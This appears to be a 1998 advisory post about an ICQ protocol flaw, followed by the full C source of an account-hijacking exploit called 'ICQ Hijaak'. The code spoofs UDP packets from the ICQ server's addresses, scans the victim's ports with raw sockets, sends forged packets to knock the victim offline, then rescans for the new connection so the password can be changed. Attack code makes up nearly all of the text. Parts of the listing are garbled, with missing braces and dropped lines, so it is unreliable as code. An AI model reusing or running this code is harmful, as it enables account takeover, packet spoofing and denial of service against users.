

    Win systems


    wumpus posted following.   Mirabilis has been extremely  negligent
    in fixing protocol holes, and this allows accounts to be subverted
    with possible leaks  of information.   Merely by leaving  your ICQ
    application logged  in (  Java _or_  Win32 )  your account  can be
    hijaaked (the password changed withoyt knowing the original).   An
    attacker  can  then  use  that  account to obtain information from
    people contacting you, or  to do other inappropriate  things which
    would result in  the account being  terminated.  This  exploit has
    been tested with 1.22 to 1.26  and still works.  This exploit  has
    rather simplistic  UDP scanning  code... if  it doesn't  work (ie,
    against .se hosts ), then you  can't hijaak them.  Lastly, even  a
    Windows user can get anyone's IP from ICQ by sending a message  to
    their UIN, and doing a netstat.

        ICQ Hijaak
        Version 1C

        Copyright (c) 1998 Wolvesbane

        By downloading or compiling this  program, you agree to the  terms
        of this license. If you do  not agree with any of these  terms you
        MUST  delete  this  program  immediately  from  all  storage areas
        (including browser caches).

        (A) You  agree  not  to  use  this  program in any way that  would
            constitute  a  violate  of  any  applicable  laws.   This  may
            included federal  laws if  you live  in the  United States and
            similar laws regarding computer security in other countries.
        (B) You  agree  to  hold  the  authors (referred to collective  as
            Wolvesbane) harmless in  any damages that  result due to  your
            possession or use of this software.
        (C) Wolvesbane  does not  claim that  this program  implements any
            functions.  As the saying goes, "You get what you pay for." --
            And you didn't pay anything for this.
        (D) This software is FREE  for _NON-COMMERCIAL_ use.  You  may not
            use this program for any commercial use (or any other activity
            which makes you  money with the  assistance of this  program).
            The author is not interested in commercial use of this program
            (and cannot think of what commercial use would consist of).
        (E) This program was  created using Linux with  IP-Masquerading to
            run the ICQ program  unmodified and without any  dissassembly.
            The  testing  was  done  with  volunteers,  and  with a second
            computer  logged  into  the  ICQ  network.   No ICQ users were
            harmed in the creation or testing of this program.
        (F) This copyright applies only to the code written by Wolvesbane,
            and not to anything included under Fair Use.
        (G) Please note that if you use ANY sections of this code in  your
            work,  (which   I  expressly   allow   as   long  as   it   is
            NON-COMMERCIAL), you are obligated  to give me some  credit in
            your  comments  (if  it  is  a  source  file  ) or in a string
            constant if it is a binary file.  If you do not wish to do so,
            you may NOT include ANY portion of this file in your own work.

    #include <arpa/inet.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <stdarg.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/socket.h>        /* for AF_INET */
    #include <sys/time.h>
    #include <sys/types.h>
    #include <unistd.h>
    int MultiResolve( char * hostname,
                    int * addr_count,
                    struct in_addr ** addresses );
    enum { FAILURE = -1, SUCCESS = 0 };
    typedef unsigned short int      u16;
    typedef unsigned long int       u32;
    typedef unsigned char           u8;
    #define byte(v,o) (*((u8 *)(&(v))+(o)))
    #define word(v,o) (*((u16 *)((unsigned char *)(&(v))+(o)) ))
    #define dword(v,o) (*((u32 *)((unsigned char *)(&(v))+(o)) ))
    unsigned char icq_check_data[256] = {
            0x0a, 0x5b, 0x31, 0x5d, 0x20, 0x59, 0x6f, 0x75,
            0x20, 0x63, 0x61, 0x6e, 0x20, 0x6d, 0x6f, 0x64,
            0x69, 0x66, 0x79, 0x20, 0x74, 0x68, 0x65, 0x20,
            0x73, 0x6f, 0x75, 0x6e, 0x64, 0x73, 0x20, 0x49,
            0x43, 0x51, 0x20, 0x6d, 0x61, 0x6b, 0x65, 0x73,
            0x2e, 0x20, 0x4a, 0x75, 0x73, 0x74, 0x20, 0x73,
            0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x22, 0x53,
            0x6f, 0x75, 0x6e, 0x64, 0x73, 0x22, 0x20, 0x66,
            0x72, 0x6f, 0x6d, 0x20, 0x74, 0x68, 0x65, 0x20,
            0x22, 0x70, 0x72, 0x65, 0x66, 0x65, 0x72, 0x65,
            0x6e, 0x63, 0x65, 0x73, 0x2f, 0x6d, 0x69, 0x73,
            0x63, 0x22, 0x20, 0x69, 0x6e, 0x20, 0x49, 0x43,
            0x51, 0x20, 0x6f, 0x72, 0x20, 0x66, 0x72, 0x6f,
            0x6d, 0x20, 0x74, 0x68, 0x65, 0x20, 0x22, 0x53,
            0x6f, 0x75, 0x6e, 0x64, 0x73, 0x22, 0x20, 0x69,
            0x6e, 0x20, 0x74, 0x68, 0x65, 0x20, 0x63, 0x6f,
            0x6e, 0x74, 0x72, 0x6f, 0x6c, 0x20, 0x70, 0x61,
            0x6e, 0x65, 0x6c, 0x2e, 0x20, 0x43, 0x72, 0x65,
            0x64, 0x69, 0x74, 0x3a, 0x20, 0x45, 0x72, 0x61,
            0x6e, 0x0a, 0x5b, 0x32, 0x5d, 0x20, 0x43, 0x61,
            0x6e, 0x27, 0x74, 0x20, 0x72, 0x65, 0x6d, 0x65,
            0x6d, 0x62, 0x65, 0x72, 0x20, 0x77, 0x68, 0x61,
            0x74, 0x20, 0x77, 0x61, 0x73, 0x20, 0x73, 0x61,
            0x69, 0x64, 0x3f, 0x20, 0x20, 0x44, 0x6f, 0x75,
            0x62, 0x6c, 0x65, 0x2d, 0x63, 0x6c, 0x69, 0x63,
            0x6b, 0x20, 0x6f, 0x6e, 0x20, 0x61, 0x20, 0x75,
            0x73, 0x65, 0x72, 0x20, 0x74, 0x6f, 0x20, 0x67,
            0x65, 0x74, 0x20, 0x61, 0x20, 0x64, 0x69, 0x61,
            0x6c, 0x6f, 0x67, 0x20, 0x6f, 0x66, 0x20, 0x61,
            0x6c, 0x6c, 0x20, 0x6d, 0x65, 0x73, 0x73, 0x61,
            0x67, 0x65, 0x73, 0x20, 0x73, 0x65, 0x6e, 0x74,
            0x20, 0x69, 0x6e, 0x63, 0x6f, 0x6d, 0x69, 0x6e };
    #define MAX_NUM_ADDRESSES     255
    int Resolve( char * hostname, struct in_addr * addr ) {
            struct hostent * hinfo;
            (void)memset( (void *)addr, 0, sizeof( struct in_addr ));
            if ( inet_aton( hostname, addr) ) return SUCCESS;
            if ( !(hinfo = gethostbyname( hostname ) ) ) return FAILURE;
            (void)memcpy( (void *)addr, (void *)hinfo->h_addr,
                    sizeof(struct in_addr )); return SUCCESS; }
    int MultiResolve( char * hostname, int * addr_count,
            struct in_addr ** addresses ) {
            int                     host_count;
            int                     i;
            char                    * p;
            struct  in_addr         address;
            struct  hostent         * hinfo;
            if ( inet_aton( hostname, &address ) ) {
                    p = (char *)malloc(sizeof(address));
                    if ( !p ) {
                            fprintf(stderr,"MultiResolve: Allocation failed!\n");
                            return FAILURE;
                    (void)memcpy((void *)p,(void *)&address, sizeof(address) );
                    *addr_count = 1;
                    *addresses = (struct in_addr *)p; return SUCCESS; }
            if ( !(hinfo = gethostbyname(hostname) ) ) return FAILURE;
            if ( hinfo->h_length != sizeof( struct in_addr ) ) {
                    fprintf(stderr,"MultiResolve:  h_length (%d) not equal "\
                            "to size of struct inaddr (%d) ",
                            hinfo->h_length, sizeof(struct in_addr) );
                    return FAILURE;
            host_count = 0;
            for (i = 0; i < MAX_NUM_ADDRESSES; i++ ) {
                    struct in_addr  * addr_ptr;
                    addr_ptr = (struct in_addr *)hinfo->h_addr_list[i];
                    if ( !addr_ptr )
            p = (char *)malloc( host_count * hinfo->h_length );
            if ( !p ) {
                    fprintf(stderr,"MultiResolve: Failed to allocate %d bytes\n",
                            host_count * hinfo->h_length );
                    return FAILURE;
            *addresses = (struct in_addr *)p;
            for ( i = 0; i < host_count; i++ ) {
                    (void)memcpy( (void *)p,(void *)hinfo->h_addr_list[i],
                            hinfo->h_length ); p += hinfo->h_length; }
            *addr_count = host_count; return SUCCESS; }
    #define IP_VERS         0
    #define IP_TOS          1
    #define IP_TOTLEN       2
    #define IP_ID           4
    #define IP_FLAGS        6
    #define IP_TIMETOLIVE   8
    #define IP_PROTOCOL     9
    #define IP_CHECKSUM     10
    #define IP_SRC          12
    #define IP_DST          16
    #define IP_END          20
    #define UDP_SOURCE      0
    #define UDP_DEST        2
    #define UDP_LENGTH      4
    #define UDP_CHECKSUM    6
    #define UDP_END         8
    #define UCHDR_SOURCE    0
    #define UCHDR_DEST      4
    #define UCHDR_PROTOCOL  9
    #define UCHDR_UDPLEN    10
    #define UCHDR_END       12
    #define ICMP_TYPE       0
    #define ICMP_CODE       1
    #define ICMP_CHECKSUM   2
    #define ICMP_END        4
    u16 cksum( u16 * buf, int numWords ) {
            u32 sum;
            sum = 0; while ( numWords -- ) { sum += *(buf++); }
            sum = ( sum >> 16) + ( sum & 0xffff ); sum += ( sum >> 16 );
            return ~sum ; }

    void make_ip_hdr(       u8      * packet, int     length, u8      protocol,
             u16     id, u16     flags, struct in_addr  me,
                    struct in_addr  you, u8      ttl ) {
            memset( packet, 0, IP_END );
            byte(*packet, IP_VERS ) = 0x45;
            word(*packet, IP_TOTLEN ) = htons( length );
            byte(*packet, IP_TIMETOLIVE ) = ttl;
            byte(*packet, IP_PROTOCOL ) = protocol;
            word(*packet, IP_ID ) = htons( id );
            word(*packet, IP_FLAGS ) = htons( flags );
            dword(*packet,IP_SRC ) = *((u32 *)&me);
            dword(*packet,IP_DST ) = *((u32 *)&you);
            word(*packet, IP_CHECKSUM ) = cksum( (u16 *)packet, IP_END/2 ); }
    void make_udp_hdr(      u8      * packet, int     udplength, u16     sport,
                            u16     dport ) {
            u8      * udp;
            static  u8      chdr[UCHDR_END];
            u32     pchecksum;

            memset( chdr, 0, UCHDR_END );

            udp = packet + ( ( byte(*packet, IP_VERS ) & 0x0F ) * 4 );
            memset( udp, 0, UDP_END );
            word(*udp, UDP_SOURCE ) = htons( sport );
            word(*udp, UDP_DEST ) = htons( dport );
            word(*udp, UDP_LENGTH ) = htons( udplength );
            memcpy( chdr + UCHDR_SOURCE, packet + IP_SRC, 8 );
            byte( *chdr, UCHDR_PROTOCOL ) = byte( *packet, IP_PROTOCOL );
            word( *chdr, UCHDR_UDPLEN ) = word( *udp, UDP_LENGTH );
            pchecksum = ( ~cksum( (u16 *)&chdr, UCHDR_END / 2 ) ) & 0xFFFF;
            if ( udplength & 1 ) { byte( *udp, udplength + 1 ) = 0; }
            pchecksum += ( ~cksum((u16 *)udp, udplength/ 2
            + (udplength&1)) ) & 0xFFFF; pchecksum    += ( pchecksum >> 16 );
            word( *udp, UDP_CHECKSUM ) = (u16)~pchecksum ; }
    int CreateRawSocket( void )
            int     s;
            int     option;

            s = socket( AF_INET, SOCK_RAW, IPPROTO_RAW );
            if ( s < 0 ) { perror("Socket:"); exit(-1); }
            option = 1;
            if ( setsockopt( s, IPPROTO_IP, IP_HDRINCL,
                            (char *)&option,  sizeof( option ) ) < 0 ) {
                    perror("Setting IP_HDRINCL"); exit(0); }
            return s; }
    int GetLocalAddress( struct in_addr remote, struct in_addr * local )
            struct sockaddr_in      laddress;
            struct sockaddr         * laddr = (struct sockaddr *)&laddress;
            struct sockaddr_in      raddress;
            struct sockaddr         * raddr = (struct sockaddr *)&raddress;
            int     s;
            int     err;
            int     len;

            s = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP );
            if ( s < 1 ) {
                    return FAILURE;
            raddress.sin_port = htons( 1984 ); /* DON'T CARE */
            raddress.sin_family = AF_INET;
            raddress.sin_addr = remote;

            err = connect(s, raddr, sizeof(raddress ));
            if ( err < 0 ) {
                    return FAILURE;
            len = sizeof(laddress);
            err = getsockname(s, laddr, &len );
            if ( err < 0 ) {
                    return FAILURE;
            *local = laddress.sin_addr;
            return SUCCESS;
    int CreateICMPSocket( void )
            int s;

            s = socket( AF_INET, SOCK_RAW, IPPROTO_ICMP );
            if ( s < 1 )
                    return FAILURE;
            return s;
    int  SendUDP( int s, struct in_addr source, struct in_addr dest,
                    u16 sport, u16 tport )
            static u8       packet[576];
            struct sockaddr_in      raddress;
            struct sockaddr         * raddr = (struct sockaddr *)&raddress;
            int     psize;
            int     err;

            raddress.sin_port = htons( 1984 ); /* DON'T CARE */
            raddress.sin_family = AF_INET;
            raddress.sin_addr = dest;

            psize = IP_END + UDP_END + 6;

            make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0,
                    source, dest, 0x7F );

            make_udp_hdr( packet, psize - IP_END, sport, tport);

            err = sendto( s, packet, psize, 0,raddr, sizeof(raddress));
            if ( err != psize ) {
                    return FAILURE;
            return SUCCESS;
    const int       verify_secs = 2;
    int VerifyUDPPort( struct in_addr addr, u16 port )
            int             s_icmp;
            struct timeval  start_time, end_time, wait_time;
            fd_set          rdfs;
            int             err;
            static u8       packet[1500]; /* should be max MTU */
            struct sockaddr junkaddr;
            int             junksize;

            u8              * icmphdr;
            u8              * fiphdr;
            u8              * fudphdr;
            int             len;
            int             got_unreach;
            struct in_addr  localaddr;
            int             rawsock;
            if ( GetLocalAddress(addr, &localaddr) == FAILURE ) {
            perror("GetLocalAddress"); exit(-1); }
            s_icmp = CreateICMPSocket();
            if ( s_icmp == FAILURE )  { perror("Getting ICMP socket"); exit(-1); }
            rawsock = CreateRawSocket();
            if ( rawsock < 0 ) { perror("Getting Raw socket"); exit(-1); }
            FD_ZERO( &rdfs ); FD_SET( s_icmp, &rdfs );
            if ( SendUDP(rawsock, localaddr, addr, 0x1984, port ) == FAILURE ) {
                    perror("Sending UDP packet"); exit(-1); }
            got_unreach = 0; gettimeofday( &start_time, NULL );
            do { wait_time.tv_usec = 0; wait_time.tv_sec = verify_secs;
                    err = select( s_icmp+1, &rdfs, NULL, NULL, &wait_time );
                    if ( -1 == err ) { perror("VerifyUDPPort - Select"); exit(-1); }
                    if ( !err ) break;
                    junksize = sizeof( struct sockaddr );
                    err = recvfrom( s_icmp, packet, 1500, 0,
                            &junkaddr, &junksize );
                    if ( -1 == err ) { perror("VerifyUDPPort - recvfrom: ");
                            exit(-1); }
                    if ( (byte(*packet,IP_PROTOCOL ) != IPPROTO_ICMP ) ||
                       (dword(*packet, IP_SRC ) != *((u32 *)&addr) )  )
                            goto check_timeout;
                    len =  ( byte(*packet, 0 ) & 0x0F ) * 4;
                    icmphdr = packet + len;
                    if ( (byte(*icmphdr,ICMP_TYPE ) != 3 ) ||
                       (byte(*icmphdr,ICMP_CODE ) != 3 )  )
                            goto check_timeout;
                    fiphdr = icmphdr + ICMP_END + 4/*clear error code*/;
                    len = ( byte(*fiphdr, 0 ) & 0x0F ) * 4;
                    if ( (byte(*fiphdr,IP_PROTOCOL ) != IPPROTO_UDP ) ||
                       ( (dword(*fiphdr, IP_DST ) != *((u32 *)&addr)  ) )   )
                            goto check_timeout;
                    fudphdr = fiphdr + len;
                    if ( word(*fudphdr, UDP_DEST ) == htons( port ) ) {
                             got_unreach = 1; break; }
                   gettimeofday( &end_time, NULL );
            } while ( ( end_time.tv_sec - start_time.tv_sec ) < verify_secs );
            close( s_icmp ); close( rawsock);
            if ( got_unreach ) return FAILURE;
     else return SUCCESS;

    typedef struct  foobar
            int     next;
            int     prev;
            u16     rem_port;
            int     times;
    } port_info;
    #define MAX_BURST       128
    #define UNUSED_HEAD     MAX_BURST + 1
    #define UNUSED_TAIL     MAX_BURST + 2
    #define LIVE_HEAD       MAX_BURST + 3
    #define LIVE_TAIL       MAX_BURST + 4
    #define FIRST_LPORT     55000
    #define SEND_COUNT      3
    #define NEXT(i) List[(i)].next
    #define PREV(i) List[(i)].prev
    #define PORT(i) List[(i)].rem_port
    #define TIMES(i) List[(i)].times
    int UDPScan( struct in_addr addr, u16 start, u16 end, u16 * tport )
            int     unused_head;
            int     unused_tail;
            int     live_head;
            int     live_tail;
            int     i;
            port_info       List[ LIVE_TAIL + 1 ];
            int     Current[ MAX_BURST ];
            int     cur_min, cur_max;
            int     now_port;
            int     delay;
            int     my_port;
            int     cur_send;
            struct timeval  wait_time;
            fd_set          rdfs;
            int     err;
            int     s_icmp, rawsock;
            struct in_addr  localaddr;
            *tport = 0;
            if ( GetLocalAddress(addr, &localaddr) == FAILURE ) {
                    perror("GetLocalAddress"); return FAILURE; }
            s_icmp = CreateICMPSocket();
            if ( s_icmp == FAILURE )  {
                    perror("Getting ICMP socket"); return FAILURE; }
            rawsock = CreateRawSocket();
            if ( rawsock < 0 ) {
                    perror("Getting Raw socket"); return FAILURE; }
            FD_ZERO( &rdfs );
            FD_SET( s_icmp, &rdfs );
            List[ LIVE_TAIL ].next = -1; List[ LIVE_TAIL ].prev = LIVE_HEAD;
            List[ LIVE_TAIL ].rem_port = 0; List[ LIVE_HEAD ].prev = -1;
            List[ LIVE_HEAD ].next = LIVE_TAIL; List[ LIVE_HEAD ].rem_port = 0;
            List[ UNUSED_TAIL ].next = -1; List[ UNUSED_TAIL ].prev = UNUSED_HEAD;
            List[ UNUSED_TAIL ].rem_port = 0; List[ UNUSED_HEAD ].prev = -1;
            List[ UNUSED_HEAD ].next = UNUSED_TAIL;
            List[ UNUSED_HEAD ].rem_port = 0;
            for ( i = 0; i < MAX_BURST ; i++ ) {
                    PREV( i ) = PREV( UNUSED_TAIL ); NEXT( i ) = UNUSED_TAIL;
                    NEXT( PREV( i ) ) = i; PREV( NEXT( i ) ) = i; PORT( i ) = 0;
                    TIMES( i ) = SEND_COUNT; }
            now_port = start;
            cur_min = now_port;
            cur_max = MAX_BURST;
            my_port = FIRST_LPORT;
            cur_send = 16;

            while ( 1 ) {
                    int     cur;
                    int     cnt;

                    cur_max = cur_send;
                    cur_min = now_port;
                    cur = List[ LIVE_HEAD ].next;
                    cnt = 0;
                    while ( NEXT(cur) != -1 ) {

                            if (!cur_max ) {

                            if ( SendUDP(rawsock, localaddr, addr,
                                    my_port, PORT(cur) ) == FAILURE ) {
                                    perror("Sending UDP packet");
                                    return FAILURE;
                            cur = NEXT(cur);

                            if ( NEXT(cur) > LIVE_TAIL ) {
                                    printf("Ugh! %d \n", NEXT(cur) );


                    for ( i = 0; i < cur_max ; i ++ ) {
                            int node;

                            if ( cur_min > end )

                            node = NEXT( UNUSED_HEAD );
                            if ( -1 == NEXT( node ) )
                            NEXT( UNUSED_HEAD ) = NEXT( node );
                            PREV( NEXT(node) ) = UNUSED_HEAD;

                            PREV( node ) = PREV( LIVE_TAIL );
                            NEXT( node ) = LIVE_TAIL;
                            NEXT( PREV( node ) ) = node;
                            PREV( NEXT( node ) ) = node;

                            PORT( node ) = cur_min + i;
                            if ( SendUDP(rawsock, localaddr, addr,
                                    my_port, cur_min+i ) == FAILURE ) {
                                    perror("Sending UDP packet");
                                    return FAILURE;

                            Current[ i ] = node;

                    if ( ( now_port >= end ) &&
                         ( !cnt ) ) {
                            printf("Found nothing!\n");
                            return SUCCESS;
                    now_port += cur_max;

                     * Delay, waiting for responses.  Continue until the
                     * operation times out, meaning that we waited long enough
                     * for a packet..
                    cnt = 0;
                    while ( 1 ) {
                            int junksize;
                            static struct sockaddr  junkaddr;
                            static u8 packet[1500];
                            int     len;
                            u8      * icmphdr, * fiphdr, *fudphdr;
                            int     got_port;
                            int     cur;

                            wait_time.tv_usec = 0;
                            wait_time.tv_sec = 5;
                            FD_SET( s_icmp, &rdfs );
                            err = select( s_icmp+1, &rdfs, NULL, NULL, &wait_time );                        if ( -1 == err ) {
                                    perror("UDPSCAN - Select");
                                    return FAILURE;
                            if ( !err )  {
                            junksize = sizeof( struct sockaddr );
                            err = recvfrom( s_icmp, packet, sizeof(packet), 0,
                                    &junkaddr, &junksize );
                            if ( -1 == err ) {
                                    perror("UDPSCAN - recvfrom: ");
                            if ( (byte(*packet,IP_PROTOCOL ) != IPPROTO_ICMP ) ||
                                    (dword(*packet, IP_SRC ) != *((u32 *)&addr) ) )
                            len =  ( byte(*packet, 0 ) & 0x0F ) * 4;
                            icmphdr = packet + len;
                            if ( (byte(*icmphdr,ICMP_TYPE ) != 3 ) ||
                                    (byte(*icmphdr,ICMP_CODE ) != 3 )  )
                            fiphdr = icmphdr + ICMP_END + 4/*clear error code*/;
                            len = ( byte(*fiphdr, 0 ) & 0x0F ) * 4;
                            if ( (byte(*fiphdr,IP_PROTOCOL ) != IPPROTO_UDP ) ||
                                    ( (dword(*fiphdr, IP_DST ) !=
                                    *((u32 *)&addr)  ) )   )
                            fudphdr = fiphdr + len;
                            got_port = ntohs( word(*fudphdr, UDP_DEST ) ) ;

                            if ( ( got_port >= cur_min ) &&
                                    ( got_port < (cur_min+cur_max) ) ) {
                                    cur = Current[ got_port - cur_min ];

                                    PREV( NEXT(cur)  ) = PREV( cur );
                                    NEXT( PREV(cur) ) = NEXT( cur );

                                    PREV( cur ) = PREV( UNUSED_TAIL );
                                    NEXT( cur ) = UNUSED_TAIL;
                                    NEXT( PREV( cur ) ) = cur;
                                    PREV( NEXT( cur ) ) = cur;

                             * if we get here, then it was one of the older
                             * ones, so look through the array for it
                            cur = NEXT( LIVE_HEAD );
                            while ( NEXT(cur) != -1 ) {
                                    if ( PORT(cur) == got_port ) {

                                            PREV( NEXT(cur)  ) = PREV( cur );
                                            NEXT( PREV(cur) ) = NEXT( cur );

                                            PREV( cur ) = PREV( UNUSED_TAIL );
                                            NEXT( cur ) = UNUSED_TAIL;
                                            NEXT( PREV( cur ) ) = cur;
                                    cur = NEXT(cur);
                            if ( NEXT(cur) == -1 ) {
                                    printf("RESPONSE FOR PORT %d UNEXPECTED! \n",
                            } else {

                    printf("[UDP Scan working] Got %d responses \n", cnt );

                    if  ( cnt < ( (cur_send/4) * 3 ) ) {

                            cur_send /= 2;
                            if ( cur_send < 16 ) {
                                    cur_send = 16;

                    } else {
                            cur_send *= 2;
                            if ( cur_send > MAX_BURST ) {
                                    cur_send = MAX_BURST;
                    } } cur = NEXT( LIVE_HEAD );
                    while ( NEXT(cur) != -1 ) {
                            if (!TIMES(cur) ) {
                                    printf("SCORE!  Port is %d \n",PORT(cur));
                                    close( s_icmp );
                                    close( rawsock);
                                    *tport = PORT(cur);
                                    return SUCCESS;
                            cur = NEXT(cur);


            close( s_icmp );
            close( rawsock);
            return SUCCESS;
    #define COMMAND_LOGOFF  0x0438
    #define RESPONSE_ERROR  0x00F0

    int WritePacket(u8        * data_ptr,
                    int     * size,
                    char    * format,
                    ...     )

            u8              * ptr;
            va_list         ap;
            u32             dword_param;
            u16             word_param;
            u8              byte_param;
            u8              * string_param;
            int             string_length;
            int             * data_length;
            ap = va_start( ap, format );
            ptr = data_ptr;

            while ( *format ) {
                    switch ( *format++ ) {
                    case 'L':  /* dword */
                            dword_param = va_arg(ap, u32 );
                            *(ptr++) = dword_param & 0xFF;
                            *(ptr++) = (dword_param >> 8 ) & 0xFF;
                            *(ptr++) = (dword_param >> 16) & 0xFF;
                            *(ptr++) = (dword_param >> 24) & 0xFF;
                    case 'W': /* word */
                            word_param = va_arg(ap, u16 );
                            *(ptr++) = word_param & 0xFF;
                            *(ptr++) = (word_param >> 8 ) & 0xFF;
                    case 'B': /* Byte */
                            byte_param = va_arg(ap, u8 );
                            *(ptr++) = byte_param;

                    case 'S': /* ICQ string */
                            string_param = va_arg(ap, u8 * );
                            string_length = strlen( string_param ) + 1;
                            *(ptr++) = (string_length ) & 0xFF;
                            *(ptr++) = (string_length >> 8)  & 0xFF;
                            memcpy( ptr, string_param, string_length );
                            ptr += string_length;
                    case 'D':  /* pure data with length byte */
                            data_length = va_arg(ap, int * );
                            string_param = va_arg(ap, u8 * );
                            memcpy( ptr, string_param , *data_length );
                            ptr += *data_length;

                            fprintf(stderr,"Invalid type %c \n", *(format-1) );
                            return FAILURE;

            /* return the size taken up */
            *size = (ptr - data_ptr );
            return SUCCESS;
    u32     icq_uin = -1;
    u16     icq_seq = 0;
    u16     icq_seq2 = 0;
    #define ICQ4_VER        0
    #define ICQ4_RANDOM     2
    #define ICQ4_ZERO       4
    #define ICQ4_COMMAND    6
    #define ICQ4_SEQ        8
    #define ICQ4_SEQ2       10
    #define ICQ4_UID        12
    #define ICQ4_CHECK      16
    #define ICQ4_END        20
    void create_icq4_hdr(
                    u8      * data_ptr,
                    u16     any_number,
                    u16     command,
                    int     data_size
    u32     check;
    u32     check2;
    u32     keyvalue;
    int     count;
    int     length;
    int     i;
    u8      ofs;
    u8      val;

    length = data_size + ICQ4_END;

    memset( data_ptr, 0, ICQ4_END );

    word(*data_ptr, ICQ4_VER ) = 0x4; word(*data_ptr, ICQ4_RANDOM) = any_number;
    word(*data_ptr, ICQ4_COMMAND ) = command; word(*data_ptr, ICQ4_SEQ ) = icq_seq;
    word(*data_ptr, ICQ4_SEQ2 ) = icq_seq2; dword(*data_ptr,ICQ4_UID ) = icq_uin;
    dword(*data_ptr,ICQ4_CHECK) = 0x0;

    check = ( *(data_ptr + 8) << 24) | ( *(data_ptr + 4) << 16 ) |
            ( *(data_ptr + 2) << 8 ) | ( *(data_ptr + 6) );
    ofs = random() % length; val = *(data_ptr + ofs );
    check2 = ( ofs << 24 ) | ( val << 16 );
    ofs = random() % 256; val = icq_check_data[ ofs ];
    check2 |= ( ofs << 8 ) | ( val ); check2 ^= 0x00FF00FF; check ^= check2;
    dword(*data_ptr,ICQ4_CHECK ) = check;
    keyvalue = length * 0x66756B65; keyvalue += check;
    count = ( length + 3 ) / 4; count += 3; count /= 4;
    for ( i = 0; i < count ; i++ ) {
            u32 * r;
            if ( i == 4 ) continue; r = (u32 *)(data_ptr + (i*4) );
     *r ^= (keyvalue + icq_check_data[i*4] ); }
    word(*data_ptr, ICQ4_VER ) = 0x4; /* NECESSARY! */

    void    create_icq3_header(     u8 * data_ptr, int * size, u16  command,
    u16  seq1, u16  seq2, u32  UIN )
            int     len, len2, err, ofs, val;
            u32     check, check2;

            err = WritePacket( data_ptr,&len, "WWWWL",
                    0x03, command, seq1, seq2, UIN );
            if ( err == FAILURE ) {
                    printf("Programmer Error in create_icq3_header\n"); exit(-1); }
            check = ( *(data_ptr + 8) << 24) | ( *(data_ptr + 4) << 16 ) |
                    ( *(data_ptr + 2) << 8 ) | ( *(data_ptr + 6) );
            ofs = random() % len; val = *(data_ptr + ofs );
            check2 = ( ofs << 24 ) | ( val << 16 );
            ofs = random() % 256;
            val = icq_check_data[ ofs ];
            check2 |= ( ofs << 8 ) | ( val );
            check2 ^= 0x00FF00FF; check ^= check2;
            err = WritePacket( (data_ptr + len),&len2,"L", check );
    *size = len + len2; }
    static  u8      packet[ 1500 ];
    void main( int argc, char ** argv );
    void main(  int argc, char ** argv )
            int     count;
            int     i;
            u16     j, k;
            struct in_addr * addr_list;
            struct in_addr * target_list;
            int     err;
            struct in_addr  you;
            struct in_addr  me;
            int             rawsock;
            struct sockaddr raddr;
            struct sockaddr_in * r_in = (struct sockaddr_in *)&raddr;
            int     size;
            u8      * data_ptr;
            u8      * hdr_ptr;
            int     hdr_size;
            u16     your_port;
            int     retries;
            int     base_port;
            if ( argc < 5 ) {
    "--=--==[ ICQ Hijaak ]=====------------------------==--------------\n"
    "Author:    *    Copyright (c) 1998  Wolvesbane\n"
    "Usage: \n"
    "       hijaak [options] icq-server target-uin target-ip new-password \n"
    "icq-server:    Packets will be *spoofed* from the (possibly plural) \n"
    "               IP addresses of this parameter. \n"
    "target-uin:    D'Oh!  \n\n"
    "target-ip:     Finding this is up to you.  May the farce be with you\n"
    "\nnew-password: D'Oh! Take a guess \n"
    "\nNo options are available at this time.\n" );
            base_port = 0;
            if ( argc > 5 ) { base_port = atoi( argv[5] ); }
            if (!base_port)  base_port = 1024;
            icq_uin = atol( argv[2] );
            if ( !icq_uin ) {
                    fprintf(stderr, "Who do you want me to kill, boss? \n");
                    exit(-1); }
            err = MultiResolve(argv[3],&count,&target_list);
            if ( err == -1 ) { herror("Resolving target\n"); exit(-1); }
            if ( count > 1 ) { fprintf(stderr,
    "Hey! Moron!  You need to specify an UNAMBIGUOUS victim IP. \n" );
                    exit(-1); }
            you = target_list[0];
            free( target_list );
            err = MultiResolve(argv[1],&count,&addr_list);
            if ( err == -1 ){ herror("Resolving ICQ server"); exit(-1); }
            r_in->sin_port = htons( 1984 ); /* DON'T CARE */
            r_in->sin_family = AF_INET; r_in->sin_addr = you;

            hdr_ptr = packet + IP_END + UDP_END;

            rawsock = CreateRawSocket();

            printf("** Scanning for luser's ICQ port ...\n");

            your_port = base_port;
            while ( 1 ) { err = UDPScan(you, your_port, 65535, &your_port );
                    if (  ( err == -1 ) || ( !your_port ) ) { fprintf(stderr,
    "D'Oh!  Can't find a target port.  Better check that target IP again!\n");
                            exit(-1); }
                    if ( FAILURE == VerifyUDPPort( you, your_port ) ) {
    "UDP scan found invalid port. Retrying...  Hit CTRL-C to exit\n");
                            continue; }
            printf("*** Got luser's port at %d \n", your_port );
            create_icq3_header(hdr_ptr, &hdr_size, RESPONSE_ERROR, 0,
                    0, icq_uin  ); retries = 3;
            while ( retries-- ) {
                    printf("Trying to knock luser offline.  Attempt %d\n",
                            3 - retries );
                    for ( i = 0; i < count ; i++ ) {
                            int     psize;

                            psize = IP_END + UDP_END + hdr_size;
                            make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0,
                                    addr_list[i], you, 0x7F );
                            make_udp_hdr( packet, psize - IP_END, 4000,your_port );
                            err = sendto( rawsock, packet, psize, 0,
                                    &raddr, sizeof(raddr));
                            if ( err != psize ) { perror("Sending"); exit(-1); }
                    if ( FAILURE == VerifyUDPPort( you, your_port ) ) { break; }
                    sleep( 3 );     /* Give 'em some time */
                    if ( FAILURE == VerifyUDPPort( you, your_port ) ) { break; }
            printf("Retries is %d \n", retries );
            if ( 0 > retries ) { fprintf(stderr,
    "Uh Oh!  Something ain't working.  Can't toast the luser.  Sorry, dude.\n");
                    exit(-1); }
            /* more time? how long does it take to reconnect? */
            printf("** Scanning for luser's _new_ ICQ port ...\n");
            while ( 1 ) {
                    err = UDPScan(you, your_port, 65535, &your_port );
                    if (  ( err == -1 ) || ( !your_port ) ) { fprintf(stderr,
    "D'Oh! Can't find the new port!  Maybe your target is smarter than you?\n");
                            exit(-1); }
                    if ( FAILURE == VerifyUDPPort( you, your_port ) ) {
    "New UDP scan found invalid port. Retrying...  Hit CTRL-C to exit\n");
                            continue; } break; }
            printf("*** Got luser's new connection at %d \n", your_port );
